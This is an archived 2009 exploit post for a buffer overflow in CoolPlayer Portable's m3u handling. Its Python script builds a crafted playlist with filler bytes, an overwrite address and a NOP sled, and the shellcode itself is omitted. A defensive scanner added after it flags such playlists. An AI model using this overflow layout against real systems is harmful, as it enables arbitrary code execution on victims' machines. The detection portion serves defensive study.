# Title : CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit #2
# Published : 2009-04-22
# Author : His0k4


#!/usr/bin/python
#[*] Usage   : coolplayer.py
#[*] Bug     : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on :    Xp sp2 (fr)
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com

#[*] Note: I didn't know why the stack's exploit won't work for me but I found that the junk data wasn't right in my case.
#[*] and we have to expand the nops to pass the null byte.
#[*] it worked for me from the beginning.

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = ""  # 160-byte encoded win32_exec payload not reproduced

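# File layout: 220 filler bytes, a 4-byte overwrite value, 122 NOPs, then the payload
exploit = "\x41"*220 + "\x5D\x38\x82\x7C" + "\x90"*122 + shellcode

try:
    # Write the crafted playlist to disk
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!\n"
except:
    print "Error"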
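
A defensive check derived from the layout of the file this script writes (220 filler bytes, a 4-byte overwrite value, a 122-byte NOP run, then the payload). It is an added example, not part of the original post: it flags playlist lines that are overlong, contain a long 0x90 run, or contain a long single-byte filler run. The function names, thresholds and sample data are assumptions made for the example.

```python
import re

# Thresholds are assumptions chosen for this example, not values from the post.
MAX_ENTRY_LEN = 200                                  # under the 220-byte filler
NOP_RUN = re.compile(rb"\x90{16,}")                  # 16+ consecutive 0x90 bytes
FILLER_RUN = re.compile(rb"(.)\1{63,}", re.DOTALL)   # one byte repeated 64+ times


def inspect_entry(entry: bytes) -> list:
    """Return the reasons one playlist line looks like overflow input."""
    reasons = []
    if len(entry) > MAX_ENTRY_LEN:
        reasons.append("overlong")
    if NOP_RUN.search(entry):
        reasons.append("nop-run")
    if FILLER_RUN.search(entry):
        reasons.append("filler-run")
    return reasons


def scan_playlist(data: bytes) -> dict:
    """Map 1-based line numbers to findings; clean lines are left out."""
    findings = {}
    for lineno, entry in enumerate(data.splitlines(), start=1):
        reasons = inspect_entry(entry)
        if reasons:
            findings[lineno] = reasons
    return findings


# Constructed samples: an ordinary playlist, and an inert line with the same
# shape as the file above (placeholder bytes stand in for address and payload).
BENIGN = b"#EXTM3U\r\n#EXTINF:215,Artist - Track\r\nC:\\Music\\track01.mp3\r\n"
SUSPECT = b"A" * 220 + b"\x00" * 4 + b"\x90" * 122 + b"\xcc" * 16 + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_playlist(blob))
```

Run it over playlists arriving from mail or downloads before they reach a player. A hit is a reason to quarantine the file, not proof of an exploit.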
